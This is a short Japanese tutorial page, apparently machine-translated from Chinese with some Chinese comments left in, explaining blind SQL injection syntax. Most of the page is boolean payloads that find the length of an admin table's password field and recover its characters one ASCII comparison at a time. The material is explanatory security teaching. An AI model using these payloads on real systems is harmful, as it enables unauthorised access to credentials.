SQLブラインドインジェクション構文について

ページに間違った数値が表示されない場合は、ブラインド インジェクション構文を使用して、ページの変更に基づいてデータ コンテンツを決定します

データ長を取得します:

and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16//错误
and (select top 1 len(password) from admin)>15//正常

指定された桁数を取得します。データ:

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常
and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97

mid(字符串,截取的位置,截取字符数)
asc(） //将字符转换成ascii码 方便进行比较

推奨: "mysql ビデオ チュートリアル "

以上がSQLブラインドインジェクション構文についての詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。